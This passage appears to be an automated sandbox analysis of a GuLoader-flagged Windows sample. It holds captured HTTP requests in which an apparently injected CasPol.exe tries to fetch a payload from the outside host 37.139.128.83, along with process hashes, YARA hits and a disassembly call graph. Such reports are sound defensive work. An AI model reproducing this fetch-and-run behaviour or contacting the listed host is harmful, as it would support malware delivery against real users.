                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:17:57.574364901 CET214INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:17:57.574408054 CET214INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    8192.168.11.204981037.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:18:07.608877897 CET228OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:18:07.643163919 CET229INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:18:07 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:18:07.643179893 CET229INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:18:07.643299103 CET229INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:18:07.643312931 CET229INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0
                                                    Mar 20, 2023 13:18:08.001169920 CET230INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    9192.168.11.204981137.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:18:18.028491020 CET231OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:18:18.062808990 CET232INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:18:17 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:18:18.062891960 CET232INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:18:18.062947989 CET232INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:18:18.062997103 CET233INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:18:18.063051939 CET233INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:2
                                                    Start time:13:15:59
                                                    Start date:20/03/2023
                                                    Path:C:\Users\user\Desktop\download.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\download.exe
                                                    Imagebase:0x400000
                                                    File size:680560 bytes
                                                    MD5 hash:064FA36DA0C2CA360B0906CC5BFE67C6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000002.00000002.1798739196.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1806817167.00000000069EF000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    General

                                                    Target ID:4
                                                    Start time:13:16:37
                                                    Start date:20/03/2023
                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\download.exe
                                                    Imagebase:0x10000
                                                    File size:106496 bytes
                                                    MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.5807012371.00000000025EF000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    General

                                                    Target ID:5
                                                    Start time:13:16:37
                                                    Start date:20/03/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7d7f70000
                                                    File size:875008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:7.3%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:26.6%
                                                      Total number of Nodes:1005
                                                      Total number of Limit Nodes:43
                                                      execution_graph 12458 402340 12465 402acb 12458->12465 12461 402acb 17 API calls 12462 40235a 12461->12462 12463 402acb 17 API calls 12462->12463 12464 402364 GetPrivateProfileStringA 12463->12464 12466 402ad7 12465->12466 12471 405f9f 12466->12471 12469 402351 12469->12461 12483 405fac 12471->12483 12472 402af8 12472->12469 12488 4061e7 12472->12488 12473 4061ce 12473->12472 12504 405f7d lstrcpynA 12473->12504 12475 4061a8 lstrlenA 12475->12483 12478 405f9f 10 API calls 12478->12475 12480 4060c4 GetSystemDirectoryA 12480->12483 12481 4060d7 GetWindowsDirectoryA 12481->12483 12482 4061e7 5 API calls 12482->12483 12483->12473 12483->12475 12483->12478 12483->12480 12483->12481 12483->12482 12484 40610b SHGetSpecialFolderLocation 12483->12484 12485 405f9f 10 API calls 12483->12485 12486 406151 lstrcatA 12483->12486 12497 405e64 12483->12497 12502 405edb wsprintfA 12483->12502 12503 405f7d lstrcpynA 12483->12503 12484->12483 12487 406123 SHGetPathFromIDListA CoTaskMemFree 12484->12487 12485->12483 12486->12483 12487->12483 12489 4061f3 12488->12489 12491 406250 CharNextA 12489->12491 12493 40625b 12489->12493 12495 40623e CharNextA 12489->12495 12496 40624b CharNextA 12489->12496 12509 405940 12489->12509 12490 40625f CharPrevA 12490->12493 12491->12489 12491->12493 12493->12490 12494 40627a 12493->12494 12494->12469 12495->12489 12496->12491 12505 405e03 12497->12505 12500 405ec7 12500->12483 12501 405e98 RegQueryValueExA RegCloseKey 12501->12500 12502->12483 12503->12483 12504->12472 12506 405e12 12505->12506 12507 405e16 12506->12507 12508 405e1b RegOpenKeyExA 12506->12508 12507->12500 12507->12501 12508->12507 12510 405946 12509->12510 12511 405959 12510->12511 12512 40594c CharNextA 12510->12512 12511->12489 12512->12510 12513 402381 12514 4023b3 12513->12514 12515 402388 12513->12515 12516 402acb 17 API calls 12514->12516 12525 402b0b 12515->12525 12518 4023ba 12516->12518 12530 402b89 12518->12530 12520 402399 12522 402acb 17 API calls 12520->12522 12523 4023a0 RegDeleteValueA RegCloseKey 12522->12523 12524 4023c7 12523->12524 12526 402acb 17 API calls 12525->12526 12527 402b22 12526->12527 12528 405e03 RegOpenKeyExA 12527->12528 12529 40238f 12528->12529 12529->12520 12529->12524 12531 402b9c 12530->12531 12533 402b95 12530->12533 12531->12533 12534 402bcd 12531->12534 12533->12524 12535 405e03 RegOpenKeyExA 12534->12535 12536 402bfb 12535->12536 12537 402c75 12536->12537 12545 402bff 12536->12545 12537->12533 12538 402c21 RegEnumKeyA 12539 402c38 RegCloseKey 12538->12539 12538->12545 12547 406315 GetModuleHandleA 12539->12547 12541 402c59 RegCloseKey 12541->12537 12543 402bcd 6 API calls 12543->12545 12544 402c69 RegDeleteKeyA 12544->12537 12545->12538 12545->12539 12545->12541 12545->12543 12546 402c4c 12546->12537 12548 406331 12547->12548 12549 40633b GetProcAddress 12547->12549 12553 4062a7 GetSystemDirectoryA 12548->12553 12551 402c48 12549->12551 12551->12544 12551->12546 12552 406337 12552->12549 12552->12551 12554 4062c9 wsprintfA LoadLibraryExA 12553->12554 12554->12552 12556 402003 12557 402015 12556->12557 12566 4020c3 12556->12566 12558 402acb 17 API calls 12557->12558 12560 40201c 12558->12560 12559 401423 24 API calls 12567 402242 12559->12567 12561 402acb 17 API calls 12560->12561 12562 402025 12561->12562 12563 40203a LoadLibraryExA 12562->12563 12564 40202d GetModuleHandleA 12562->12564 12565 40204a GetProcAddress 12563->12565 12563->12566 12564->12563 12564->12565 12568 402096 12565->12568 12569 402059 12565->12569 12566->12559 12622 4050a4 12568->12622 12571 402061 12569->12571 12572 402078 12569->12572 12619 401423 12571->12619 12577 706b16db 12572->12577 12573 402069 12573->12567 12575 4020b7 FreeLibrary 12573->12575 12575->12567 12578 706b170b 12577->12578 12633 706b1a98 12578->12633 12580 706b1712 12581 706b1834 12580->12581 12582 706b172a 12580->12582 12583 706b1723 12580->12583 12581->12573 12667 706b22b1 12582->12667 12683 706b226f 12583->12683 12588 706b178e 12594 706b17dc 12588->12594 12595 706b1794 12588->12595 12589 706b1770 12696 706b2498 12589->12696 12590 706b1759 12604 706b174f 12590->12604 12693 706b2c83 12590->12693 12591 706b1740 12593 706b1746 12591->12593 12598 706b1751 12591->12598 12593->12604 12677 706b29f8 12593->12677 12596 706b2498 11 API calls 12594->12596 12715 706b156b 12595->12715 12602 706b17cd 12596->12602 12597 706b1776 12707 706b1559 12597->12707 12687 706b2672 12598->12687 12610 706b1823 12602->12610 12721 706b245e 12602->12721 12604->12588 12604->12589 12608 706b1757 12608->12604 12609 706b2498 11 API calls 12609->12602 12610->12581 12614 706b182d GlobalFree 12610->12614 12614->12581 12616 706b180f 12616->12610 12725 706b14e2 wsprintfA 12616->12725 12617 706b1808 FreeLibrary 12617->12616 12620 4050a4 24 API calls 12619->12620 12621 401431 12620->12621 12621->12573 12623 4050bf 12622->12623 12631 405162 12622->12631 12624 4050dc lstrlenA 12623->12624 12625 405f9f 17 API calls 12623->12625 12626 405105 12624->12626 12627 4050ea lstrlenA 12624->12627 12625->12624 12629 405118 12626->12629 12630 40510b SetWindowTextA 12626->12630 12628 4050fc lstrcatA 12627->12628 12627->12631 12628->12626 12629->12631 12632 40511e SendMessageA SendMessageA SendMessageA 12629->12632 12630->12629 12631->12573 12632->12631 12728 706b1215 GlobalAlloc 12633->12728 12635 706b1abc 12729 706b1215 GlobalAlloc 12635->12729 12637 706b1cde GlobalFree GlobalFree GlobalFree 12638 706b1cfb 12637->12638 12654 706b1d45 12637->12654 12640 706b20b1 12638->12640 12648 706b1d10 12638->12648 12638->12654 12639 706b1b9b GlobalAlloc 12662 706b1ac7 12639->12662 12641 706b20d3 GetModuleHandleA 12640->12641 12640->12654 12644 706b20f9 12641->12644 12645 706b20e4 LoadLibraryA 12641->12645 12642 706b1be6 lstrcpyA 12647 706b1bf0 lstrcpyA 12642->12647 12643 706b1c04 GlobalFree 12643->12662 12736 706b15c2 GetProcAddress 12644->12736 12645->12644 12645->12654 12647->12662 12648->12654 12732 706b1224 12648->12732 12649 706b214a 12652 706b2157 lstrlenA 12649->12652 12649->12654 12650 706b2011 12650->12654 12658 706b2055 lstrcpyA 12650->12658 12737 706b15c2 GetProcAddress 12652->12737 12653 706b1f95 12735 706b1215 GlobalAlloc 12653->12735 12654->12580 12655 706b210b 12655->12649 12665 706b2134 GetProcAddress 12655->12665 12658->12654 12659 706b1c42 12659->12662 12730 706b1534 GlobalSize GlobalAlloc 12659->12730 12660 706b1ed7 GlobalFree 12660->12662 12661 706b2170 12661->12654 12662->12637 12662->12639 12662->12642 12662->12643 12662->12647 12662->12650 12662->12653 12662->12654 12662->12659 12662->12660 12664 706b1224 2 API calls 12662->12664 12664->12662 12665->12649 12666 706b1f9d 12666->12580 12671 706b22ca 12667->12671 12669 706b2406 GlobalFree 12669->12671 12672 706b1730 12669->12672 12670 706b2378 GlobalAlloc MultiByteToWideChar 12674 706b23c5 12670->12674 12675 706b23a4 GlobalAlloc CLSIDFromString GlobalFree 12670->12675 12671->12669 12671->12670 12673 706b1224 GlobalAlloc lstrcpynA 12671->12673 12671->12674 12739 706b12ad 12671->12739 12672->12590 12672->12591 12672->12604 12673->12671 12674->12669 12743 706b2606 12674->12743 12675->12669 12679 706b2a0a 12677->12679 12678 706b2aaf ReadFile 12682 706b2acd 12678->12682 12679->12678 12681 706b2b99 12681->12604 12746 706b29a4 12682->12746 12684 706b2284 12683->12684 12685 706b1729 12684->12685 12686 706b228f GlobalAlloc 12684->12686 12685->12582 12686->12684 12691 706b26a2 12687->12691 12688 706b273d GlobalAlloc 12692 706b2760 12688->12692 12689 706b2750 12690 706b2756 GlobalSize 12689->12690 12689->12692 12690->12692 12691->12688 12691->12689 12692->12608 12694 706b2c8e 12693->12694 12695 706b2cce GlobalFree 12694->12695 12750 706b1215 GlobalAlloc 12696->12750 12698 706b2558 WideCharToMultiByte 12705 706b24a4 12698->12705 12699 706b2523 lstrcpynA 12699->12705 12700 706b2534 StringFromGUID2 WideCharToMultiByte 12700->12705 12701 706b2579 wsprintfA 12701->12705 12702 706b259d GlobalFree 12702->12705 12703 706b25d7 GlobalFree 12703->12597 12704 706b1266 2 API calls 12704->12705 12705->12698 12705->12699 12705->12700 12705->12701 12705->12702 12705->12703 12705->12704 12751 706b12d1 12705->12751 12755 706b1215 GlobalAlloc 12707->12755 12709 706b155e 12710 706b156b 2 API calls 12709->12710 12711 706b1568 12710->12711 12712 706b1266 12711->12712 12713 706b12a8 GlobalFree 12712->12713 12714 706b126f GlobalAlloc lstrcpynA 12712->12714 12713->12602 12714->12713 12716 706b1577 wsprintfA 12715->12716 12717 706b15a4 lstrcpyA 12715->12717 12720 706b15bd 12716->12720 12717->12720 12720->12609 12722 706b246c 12721->12722 12723 706b17ef 12721->12723 12722->12723 12724 706b2485 GlobalFree 12722->12724 12723->12616 12723->12617 12724->12722 12726 706b1266 2 API calls 12725->12726 12727 706b1503 12726->12727 12727->12610 12728->12635 12729->12662 12731 706b1552 12730->12731 12731->12659 12738 706b1215 GlobalAlloc 12732->12738 12734 706b1233 lstrcpynA 12734->12654 12735->12666 12736->12655 12737->12661 12738->12734 12740 706b12b4 12739->12740 12741 706b1224 2 API calls 12740->12741 12742 706b12cf 12741->12742 12742->12671 12744 706b266a 12743->12744 12745 706b2614 VirtualAlloc 12743->12745 12744->12674 12745->12744 12747 706b29af 12746->12747 12748 706b29bf 12747->12748 12749 706b29b4 GetLastError 12747->12749 12748->12681 12749->12748 12750->12705 12752 706b12da 12751->12752 12753 706b12f9 12751->12753 12752->12753 12754 706b12e0 lstrcpyA 12752->12754 12753->12705 12754->12753 12755->12709 12756 401746 12757 402acb 17 API calls 12756->12757 12758 40174d 12757->12758 12762 405b45 12758->12762 12760 401754 12761 405b45 2 API calls 12760->12761 12761->12760 12763 405b50 GetTickCount GetTempFileNameA 12762->12763 12764 405b7d 12763->12764 12765 405b81 12763->12765 12764->12763 12764->12765 12765->12760 12766 404187 12767 40419d 12766->12767 12769 4042a9 12766->12769 12801 40401c 12767->12801 12768 404318 12771 4043e2 12768->12771 12772 404322 GetDlgItem 12768->12772 12769->12768 12769->12771 12779 4042ed GetDlgItem SendMessageA 12769->12779 12810 404083 12771->12810 12775 4043a0 12772->12775 12776 404338 12772->12776 12774 4041f3 12777 40401c 18 API calls 12774->12777 12775->12771 12782 4043b2 12775->12782 12776->12775 12781 40435e SendMessageA LoadCursorA SetCursor 12776->12781 12780 404200 CheckDlgButton 12777->12780 12806 40403e KiUserCallbackDispatcher 12779->12806 12804 40403e KiUserCallbackDispatcher 12780->12804 12798 40442b 12781->12798 12786 4043b8 SendMessageA 12782->12786 12787 4043c9 12782->12787 12786->12787 12792 4043dd 12787->12792 12793 4043cf SendMessageA 12787->12793 12788 404313 12807 404407 12788->12807 12790 40421e GetDlgItem 12805 404051 SendMessageA 12790->12805 12793->12792 12795 404234 SendMessageA 12796 404252 GetSysColor 12795->12796 12797 40425b SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 12795->12797 12796->12797 12797->12792 12824 40565f ShellExecuteExA 12798->12824 12800 404391 LoadCursorA SetCursor 12800->12775 12802 405f9f 17 API calls 12801->12802 12803 404027 SetDlgItemTextA 12802->12803 12803->12774 12804->12790 12805->12795 12806->12788 12808 404415 12807->12808 12809 40441a SendMessageA 12807->12809 12808->12809 12809->12768 12811 404146 12810->12811 12812 40409b GetWindowLongA 12810->12812 12811->12792 12812->12811 12813 4040b0 12812->12813 12813->12811 12814 4040e0 12813->12814 12815 4040dd GetSysColor 12813->12815 12816 4040f0 SetBkMode 12814->12816 12817 4040e6 SetTextColor 12814->12817 12815->12814 12818 404108 GetSysColor 12816->12818 12819 40410e 12816->12819 12817->12816 12818->12819 12820 404115 SetBkColor 12819->12820 12821 40411f 12819->12821 12820->12821 12821->12811 12822 404132 DeleteObject 12821->12822 12823 404139 CreateBrushIndirect 12821->12823 12822->12823 12823->12811 12824->12800 12825 403b48 12826 403b60 12825->12826 12827 403c9b 12825->12827 12826->12827 12828 403b6c 12826->12828 12829 403cac GetDlgItem GetDlgItem 12827->12829 12834 403cec 12827->12834 12830 403b77 SetWindowPos 12828->12830 12831 403b8a 12828->12831 12832 40401c 18 API calls 12829->12832 12830->12831 12836 403ba7 12831->12836 12837 403b8f ShowWindow 12831->12837 12838 403cd6 SetClassLongA 12832->12838 12833 403d46 12840 403c96 12833->12840 12896 404068 12833->12896 12834->12833 12839 401389 2 API calls 12834->12839 12841 403bc9 12836->12841 12842 403baf DestroyWindow 12836->12842 12837->12836 12843 40140b 2 API calls 12838->12843 12844 403d1e 12839->12844 12846 403bce SetWindowLongA 12841->12846 12847 403bdf 12841->12847 12845 403fa5 12842->12845 12843->12834 12844->12833 12850 403d22 SendMessageA 12844->12850 12845->12840 12856 403fd6 ShowWindow 12845->12856 12846->12840 12848 403c88 12847->12848 12849 403beb GetDlgItem 12847->12849 12855 404083 8 API calls 12848->12855 12853 403c1b 12849->12853 12854 403bfe SendMessageA IsWindowEnabled 12849->12854 12850->12840 12851 40140b 2 API calls 12863 403d58 12851->12863 12852 403fa7 DestroyWindow EndDialog 12852->12845 12858 403c28 12853->12858 12859 403c6f SendMessageA 12853->12859 12860 403c3b 12853->12860 12870 403c20 12853->12870 12854->12840 12854->12853 12855->12840 12856->12840 12857 405f9f 17 API calls 12857->12863 12858->12859 12858->12870 12859->12848 12864 403c43 12860->12864 12865 403c58 12860->12865 12862 40401c 18 API calls 12862->12863 12863->12840 12863->12851 12863->12852 12863->12857 12863->12862 12871 40401c 18 API calls 12863->12871 12887 403ee7 DestroyWindow 12863->12887 12909 40140b 12864->12909 12867 40140b 2 API calls 12865->12867 12866 403c56 12866->12848 12869 403c5f 12867->12869 12869->12848 12869->12870 12912 403ff5 12870->12912 12872 403dd3 GetDlgItem 12871->12872 12873 403df0 ShowWindow KiUserCallbackDispatcher 12872->12873 12874 403de8 12872->12874 12899 40403e KiUserCallbackDispatcher 12873->12899 12874->12873 12876 403e1a EnableWindow 12881 403e2e 12876->12881 12877 403e33 GetSystemMenu EnableMenuItem SendMessageA 12878 403e63 SendMessageA 12877->12878 12877->12881 12878->12881 12881->12877 12900 404051 SendMessageA 12881->12900 12901 403b29 12881->12901 12904 405f7d lstrcpynA 12881->12904 12883 403e92 lstrlenA 12884 405f9f 17 API calls 12883->12884 12885 403ea3 SetWindowTextA 12884->12885 12905 401389 12885->12905 12887->12845 12888 403f01 CreateDialogParamA 12887->12888 12888->12845 12889 403f34 12888->12889 12890 40401c 18 API calls 12889->12890 12891 403f3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos 12890->12891 12892 401389 2 API calls 12891->12892 12893 403f85 12892->12893 12893->12840 12894 403f8d ShowWindow 12893->12894 12895 404068 SendMessageA 12894->12895 12895->12845 12897 404080 12896->12897 12898 404071 SendMessageA 12896->12898 12897->12863 12898->12897 12899->12876 12900->12881 12902 405f9f 17 API calls 12901->12902 12903 403b37 SetWindowTextA 12902->12903 12903->12881 12904->12883 12907 401390 12905->12907 12906 4013fe 12906->12863 12907->12906 12908 4013cb MulDiv SendMessageA 12907->12908 12908->12907 12910 401389 2 API calls 12909->12910 12911 401420 12910->12911 12911->12870 12913 404002 SendMessageA 12912->12913 12914 403ffc 12912->12914 12913->12866 12914->12913 12915 402688 12916 402904 12915->12916 12917 40268f 12915->12917 12923 402aa9 12917->12923 12919 402696 12920 4026a5 SetFilePointer 12919->12920 12920->12916 12921 4026b5 12920->12921 12926 405edb wsprintfA 12921->12926 12924 405f9f 17 API calls 12923->12924 12925 402abe 12924->12925 12925->12919 12926->12916 12927 401c0a 12928 402aa9 17 API calls 12927->12928 12929 401c11 12928->12929 12930 402aa9 17 API calls 12929->12930 12931 401c1e 12930->12931 12932 401c33 12931->12932 12933 402acb 17 API calls 12931->12933 12934 401c43 12932->12934 12935 402acb 17 API calls 12932->12935 12933->12932 12936 401c9a 12934->12936 12937 401c4e 12934->12937 12935->12934 12938 402acb 17 API calls 12936->12938 12939 402aa9 17 API calls 12937->12939 12940 401c9f 12938->12940 12941 401c53 12939->12941 12942 402acb 17 API calls 12940->12942 12943 402aa9 17 API calls 12941->12943 12944 401ca8 FindWindowExA 12942->12944 12945 401c5f 12943->12945 12948 401cc6 12944->12948 12946 401c8a SendMessageA 12945->12946 12947 401c6c SendMessageTimeoutA 12945->12947 12946->12948 12947->12948 12949 4025ca 12950 402aa9 17 API calls 12949->12950 12953 4025d4 12950->12953 12951 402642 12953->12951 12954 402644 12953->12954 12956 402654 12953->12956 12958 405b8e ReadFile 12953->12958 12960 405edb wsprintfA 12954->12960 12956->12951 12957 40266a SetFilePointer 12956->12957 12957->12951 12959 405bac 12958->12959 12959->12953 12960->12951 12961 4014ca 12962 4050a4 24 API calls 12961->12962 12963 4014d1 12962->12963 12964 706b28e1 12965 706b2931 12964->12965 12966 706b28f1 VirtualProtect 12964->12966 12966->12965 12967 4020d1 12968 402acb 17 API calls 12967->12968 12969 4020d8 12968->12969 12970 402acb 17 API calls 12969->12970 12971 4020e2 12970->12971 12972 402acb 17 API calls 12971->12972 12973 4020ec 12972->12973 12974 402acb 17 API calls 12973->12974 12975 